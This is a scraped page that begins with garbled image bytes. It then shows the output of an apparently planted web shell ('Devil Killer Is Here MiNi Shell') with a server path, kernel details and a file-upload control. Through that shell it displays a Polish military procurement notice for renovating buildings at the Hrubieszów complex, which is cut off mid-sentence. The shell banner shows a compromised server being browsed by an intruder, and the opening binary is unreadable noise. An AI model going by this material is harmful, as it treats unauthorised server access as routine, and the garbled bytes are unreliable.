JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230703/0028561101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Robota budowlana w zakresie 2 części: Cz. 1 – Remont budynku nr 17 w kompleksie wojskowym w Hrubieszowie; Cz. 2 – Remont sanitariatów w budynku nr 3 w kompleksie wojskowym w Hrubieszowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">32 Wojskowy Oddział Gospodarczy w Zamościu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061402337</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 2F</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zamość</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261-181-536</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">261-1181-607</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">32wog.zampub@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.32wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Wojskowa Jednostka Budżetowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Robota budowlana w zakresie 2 części: Cz. 1 – Remont budynku nr 17 w kompleksie wojskowym w Hrubieszowie; Cz. 2 – Remont sanitariatów w budynku nr 3 w kompleksie wojskowym w Hrubieszowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a7b543f6-1970-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00285611</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00133564/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 K-1006 Hrubieszów- Budynek nr 3</p> <p class="mb-0">1.1.11 K-1006 Hrubieszów- budynek nr 17-remont pomieszczeń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/32wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/32wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Środkiem komunikacji elektronicznej, służącym złożeniu przez Wykonawcę oferty jest platforma zakupowa https://portal.smartpzp.pl/32wog<br/>W sytuacji awarii Systemu lub niedostępności Systemu, uniemożliwiającego komunikację Wykonawcy i Zamawiającego poprzez System, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: 32wog.zampub@ron.mil.pl Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie ani logowania do Systemu. Za pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego tj. użytkownika Wykonawcy odbywa się komunikacja Wykonawcy z Zamawiającym w postępowaniu, w szczególności przekazywanie dokumentów, oświadczeń, informacji, pytań w<br/>ramach postępowania. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Zadawanie pytań przez Wykonawców odbywa się w zakładce „Pytania do postępowania”. Po otwarciu ofert, komunikacja miedzy Zamawiającym a<br/>Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są za pośrednictwem systemu, w zakładce „Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”, po zaznaczeniu numeru złożonej oferty. Do pełnego i prawidłowego korzystania z Systemu przez Wykonawców konieczne jest posiadanie co najmniej jednego podpisu kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego służącego do autentykacji i podpisu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych I w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), dalej “RODO”, Zamawiający informuje, że: <br/>1)	Administratorem Pani/Pana danych osobowych jest 32 Wojskowy Oddział Gospodarczy w Zamościu, ul. Wojska Polskiego 2F, 22 – 400 Zamość;<br/>2)	Inspektor ochrony danych osobowych w 32 Wojskowym Oddziale Gospodarczym w Zamościu kontakt e-mail: 32wog.iodo@ron.mil.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pod nazwą: robota budowlana w zakresie 2 części: Część 1 - Remont budynku nr 17 w kompleksie wojskowym w Hrubieszowie; Część 2 – Remont sanitariatów w budynku nr 3 w kompleksie wojskowym w Hrubieszowie. Nr sprawy ZP/TP/31/2023, prowadzonym w trybie art. 275 pkt 2) ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2022 poz. 1710 z późn. zm.)<br/>6.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 poz. 1710 z późn. zm.), dalej „ustawa Pzp”; <br/>7.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>8.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>9.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>10.	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>11.	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/31/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest na robota budowlana w zakresie 2 części: <br/>	Część 1 - Remont budynku nr 17 w kompleksie wojskowym w Hrubieszowie;<br/>Zakres prac: <br/>I.	ROBOTY BUDOWLANE<br/>a)	Roboty rozbiórkowe:<br/>	Demontaż płycinowych skrzydeł drzwiowych, wykucie drewnianych i stalowych ościeżnic z muru;<br/>	Demontaż stolarki drzwiowej zewnętrznej;<br/>	Demontaż krat okiennych, stalowych;<br/>	Rozebranie posadzek z tworzyw sztucznych, z płytek ceramicznych;<br/>	Skucie starych podkładów betonowych;<br/>	Wykucie z muru podokienników lastrykowych w całym budynku;<br/>	Odbicie tynków wewnętrznych z zaprawy cementowo-wapiennej;<br/>	Rozebranie okładzin z płytek ceramicznych w sanitariacie;<br/>	Wywóz materiałów porozbiórkowych – drewno, gruz, ceramika, glazura itp.;<br/>	Przewiezienie złomu stalowego do magazynu SOI GZ Hrubieszów.<br/>b)	Roboty ogólnobudowlane:<br/>	Wykucie otworów w ścianach z cegieł ceramicznych na zaprawie cem.-wap dla stolarki drzwiowej (1 szt.)<br/>	Zamurowanie otworów po wykutych ościeżnicach (1 sz.);<br/>	Dostawienie ścianki działowej z cegły pełnej w sanitariacie, na pełną wysokość pomieszczenia;<br/>	Obsadzenie nadproży w ścianach wewnętrznych (1 otwór drzwiowy);<br/>	Obsadzenie podokienników z konglomeratów kamiennych (12 szt.);<br/>	Wykonanie sufitu podwieszonego o konstrukcji metalowej z wypełnieniem z kasetonów w pomieszczeniu dowódcy warty;<br/>	Wykonanie sufitu podwieszonego o konstrukcji metalowej z zastosowaniem impregnowanych płyt g-k w pomieszczeniu sanitariatu;<br/>	Licowanie ścian sanitariatu płytkami glazurowanymi do pełnej wysokości;<br/>	Licowanie ściany pomieszczenia socjalnego płytkami glazurowanymi do <br/>wys. 1,40 m;<br/>	Montaż kabiny prysznicowej oraz kabiny WC w technologii ścianek działowych lekkich LTT z płyty HPL o gr. 13 mm;<br/>	Montaż ścianek działowych lekkich LTT z płyty HPL o gr. 13 mm <br/>w pomieszczeniu dowódcy warty oraz w pomieszczeniu odpoczynku (wydzielenie części pomieszczeń);<br/>	Oklejenie folią mleczną okna w sanitariacie (pełna wysokość szyby), oklejenie okien folią mleczną w pozostałych pomieszczeniach zapewniającą brak możliwości wglądu – oklejenie szyb do wys. 2/3 okna.<br/>	Wykonanie zabudowy meblowej w pomieszczeniu socjalnym, zabudowa stojąca o wym. podanych w przedmiarze (zabudowa ze zlewozmywakiem), montaż szafki wiszące nad zabudową stojącą.<br/>c)	Posadzki:<br/>	Wykonanie posadzki cementowej zatartej na ostro (podkład z zagęszczonego piasku na podłożu gruntowym; podkład z betonu; izolacja przeciwwilgociowa <br/>z folii szerokiej PE; izolacja cieplna z płyt styropianowych; posadzka cementowa)<br/>	Wykonanie posadzek z płytek (gres) o wymiarach 30x30 cm wraz z cokolikami.<br/>d)	Stolarka drzwiowa:<br/>	Dostawa i montaż drzwi stalowych wewnątrzlokalowych, jednoskrzydłowych z ościeżnicą stalową oklejoną w kolorze skrzydła, wymiar w świetle ościeżnicy 90/200 (5 szt.)<br/>	Dostawa i montaż drzwi stalowych wewnątrzlokalowych, jednoskrzydłowych, łazienkowych z tulejami wentylacyjnymi z ościeżnicą stalową oklejoną w kolorze skrzydła, wymiar w świetle ościeżnicy 90/200 (2 szt.)<br/>	Dostawa i montaż drzwi zewnętrznych jednoskrzydłowych z ościeżnicą metalową, drzwi zewnętrzne RC3 (2 szt.) wg specyfikacji, wymiar w świetle ościeżnicy 100/200);<br/>	Dostawa i montaż drzwi wewnętrznych jednoskrzydłowych z ościeżnicą metalową, drzwi wewnętrzne RC3 (1 szt.) wg specyfikacji, wymiar w świetle ościeżnicy 90/200;<br/>	Dostawa i montaż drzwi rewizyjnych aluminiowych, zewnętrznych (1 szt.) wg specyfikacji, wymiar otworu do zabezpieczenia 1,30x0,80 m);<br/>e)	Roboty tynkowe i malarskie:<br/>	Odgrzybianie ścian ceglanych preparatami solnymi;<br/>	Uzupełnienie i naprawa tynków wewnętrznych zwykłych kategorii III z zaprawy cementowo-wapiennej na ścianach;<br/>	Przygotowanie ścian do malowania, wyrównanie ścian z poszpachlowaniem nierówności;<br/>	Ochrona narożników wypukłych narożnikami metalowymi;<br/>	Gruntowanie – wzmocnienie podłoży preparatami;<br/>	Dwukrotne malowanie tynków wewnętrznych ścian i sufitów farbą lateksową;<br/>f)	Montaż krat stalowych:<br/>	Montaż krat okiennych w pomieszczeniach wartowni (11 szt.) w tym jedna krata okienna otwierana (we wskazanym przez Zamawiającego pomieszczeniu), kraty wykonane wg specyfikacji;<br/>	Montaż kraty okiennej w sanitariacie (1 szt.), kraty wykonane wg specyfikacji;<br/>	Naprawa oraz malowanie ościeży okiennych przed wstawieniem krat stalowych;<br/>	Montaż kratek zabezpieczających otwory wentylacyjne we wszystkich pomieszczeniach, kraty wykonane wg specyfikacji – kraty o wymiarze 35x35 cm;<br/>	Montaż krat zabezpieczających wejścia na poddasze nieużytkowe budynku <br/>(2 szt.), kraty wykonane wg specyfikacji.<br/><br/>II.	ROBOTY SANITARNE<br/>a)	Instalacja wodno-kanalizacyjna, urządzenia sanitarne<br/>-	Demontaż umywalki;<br/>-	Demontaż ustępu z miską porcelanową;<br/>-	Demontaż baterii umywalkowej;<br/>-	Demontaż wewnętrznej instalacji wodnej i kanalizacyjnej;<br/>-	Wykonanie rurociągów z tworzyw sztucznych o połączeniach zgrzewanych;(instalacja ciepłej i zimnej wody), wykonanie podejść dopływowych do baterii;<br/>-	Montaż umywalki porcelanowej, baterii umywalkowej;<br/>-	Wykonanie rurociągów kanalizacyjnych (PCV) o połączeniach wciskowych oraz podejść odpływowych do urządzeń sanitarnych, wykonanie odpowietrzenia instalacji kanalizacyjnej;<br/>-	Montaż miski ustępowej typu compact;<br/>-	Montaż odpływu liniowego w kabinie prysznicowej;<br/>-	Montaż baterii natryskowej z natryskiem przesuwnym;<br/>-	Montaż zawory czerpalnego o śr. nominalnej 20 mm;<br/>-	Montaż wpustu ciekowego w tworzywa sztucznego.<br/>-	Wymiana przyłącza kanalizacyjnego do budynku;<br/>-	Montaż studzienki kanalizacyjnej z PCV o śr. 600 mm (kineta dopływ prawy i lewy).<br/>b)	wentylacja grawitacyjna<br/>	Wykonanie przewodów wentylacji grawitacyjnej z rur z elastycznego PCV łączonych na wcisk;<br/>	Wykonanie izolacji przewodów wentylacyjnych (izolacja styropianowa);<br/>	Montaż kratek wentylacyjnych na końcach przewodów (3 szt);<br/>	Montaż wentylatorów osiowych o średnicy dopasowanej do przewodu wentylacyjnego w sanitariacie (2 szt.);<br/>	Montaż kominków wentylacyjnych na dachu (2 szt.).<br/>III.	ROBOTY ELEKTRYCZNE<br/>a)	Wymiana przyłącza<br/>	Wykonanie wykopu o głębokości 80 cm w gruncie kat. III;<br/>	Ułożenie kabla na słupie osłonie rurowej dostosowanej do średnicy kabla;<br/>	Wykonanie warstwy zagęszczonego piasku pod ułożenie kabla;<br/>	Ręczne układanie kabli w rowach kablowych, przykrycie kabla folią sygnalizacyjną koloru niebieskiego; równoległe ułożenie bednarki;<br/>	Zasypywanie rowów: przykrycie 10 cm warstwą piasku, zasypanie wykopu gruntem rodzimym;<br/>	Zamontowanie szafki zasilającej (złącze kablowe) z wykorzystaniem obudów poliestrowych; montaż głównego wyłącznika prądu.<br/>	Demontaż istniejącego przyłącza napowietrznego.<br/>b)	Demontaż starego osprzętu elektrycznego<br/>	Demontaż starych opraw oświetleniowych, halogenowych;<br/>	Demontaż łączników instalacyjnych natynkowych o natężeniu prądu do 10 A - 1 wylot (wyłącznik lub przełącznik 1 biegunowy, 2 biegunowy)<br/>	Demontaż gniazd 230V;<br/>	Montaż nowej rozdzielni typu R-Box (w miejsce obok nowego złącza kablowego)<br/>c)	Wymiana instalacji elektrycznej	<br/>	Montaż kompletnej tablicy bezpiecznikowej w wiatrołapie, wykonanie zasilania ze złącza kablowego do tablicy głównej;<br/>	Montaż przeciwpożarowego wyłącznika prądu;<br/>	Mechaniczne wykucie bruzd dla przewodów wtynkowych w ścianach z cegły pełnej, wykonanie przejść przez ściany (zaprawianie bruzd);<br/>	Montaż puszek instalacyjnych podtynkowych o śr. 60 mm;<br/>	Przewód płaski łączny przekrój żył do 7,5 mm2 układany <br/>w tynku [przewód N2XH-J 3x2,5 mm2] – wykonanie dodatkowych obwodów.<br/>	Przewód płaski łączny przekrój żył do 7,5 mm2 układany <br/>w tynku [przewód N2XH-J 3x1,5 mm2] – wykonanie dodatkowego oświetlenia.<br/>	Przewód okrągły łączny przekrój żył do 7,5 mm2 układany natynkowo [przewód HGDs 5x1,5 mm2];<br/>d)	Montaż osprzętu instalacyjnego<br/>	Montaż łączników instalacyjnych podtynkowych pojedynczych oraz podwójnych, w puszce instalacyjnej z podłączeniem;<br/>	Montaż gniazd wtyczkowych podwójnych oraz pojedynczych z podłączeniem [gniazda p/t 2x2P+Z 10/16A 230V IP20, gniazd p/t 2P+Z 10/16A 230V IP20]; montaż gniazd pojedynczych bryzgoszczelnych 2P+Z 10/16A 230V IP44].<br/>e)	Montaż opraw oświetleniowych<br/>	Montaż w suficie podwieszonym opraw oświetleniowych (z podłączeniem) [oprawa do wbudowania w suficie podwieszonym modułowa LED 840 40 W 4000 lm IP20];<br/>	Montaż w sanitariacie, na suficie podwieszonym opraw oświetleniowych natynkowych (z podłączeniem) [oprawa modułowa LED 840 13 W 4000 lm IP44];<br/>	Montaż opraw oświetleniowych LED zewnętrznych [oprawa o stopniu ochrony IP 65, zewnętrzna - jedna oprawa z opisem WARTOWNIA, druga bez opisu]<br/>	Montaż z podłączeniem na gotowym podłożu oprawy oświetleniowej nad umywalką [oprawa LED o stopniu ochrony IP44, przeznaczona do zamontowania w sanitariacie]<br/>f)	Pozostałe roboty instalacyjne<br/>	Montaż oraz zasilenie wentylatorów osiowych o średnicy 150 mm wraz <br/>z oprawami (2 szt. w sanitariacie)<br/>	Sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia;<br/>	Pomiar rezystancji izolacji instalacji elektrycznych - obwód 1-fazowy, pierwszy pomiar i każdy następny pomiar;<br/>	Sprawdzenie samoczynnego wyłączenia zasilania - pomiar impedancji pętli zwarciowej – pierwszy i każdy następny;<br/>	Sprawdzenie samoczynnego wyłączenia zasilania - próby działania wyłącznika różnicowoprądowego – pierwszy i każdy następny<br/>	Badanie linii kablowej<br/>	Pomiar natężenie oświetlenia na stanowiskach pracy<br/>	Wykonanie dokumentacji powykonawczej instalacji elektrycznej<br/>	Oznakowanie i opisanie rozdzielnic, złącza kablowego, osprzętu elektrycznego. <br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA OKREŚLAJĄ:<br/>W ZAKRESIE CZĘSCI NR 1:<br/>1)	Specyfikacja Techniczna Wykonania i Odbioru Robót (STWiOR) - stanowiąca Załącznik nr 1 do SWZ - w zakresie części nr 1.<br/>2)	Przedmiar robót – stanowiący Załącznik nr 1a do SWZ w zakresie części nr 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najwyżej ocenioną zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów przyznanych w następujących kryteriach:<br/>1)	Cena CO (w rozumieniu ceny brutto) - waga 80%, gdzie punkty wyliczane są wg następującego wzoru:<br/> 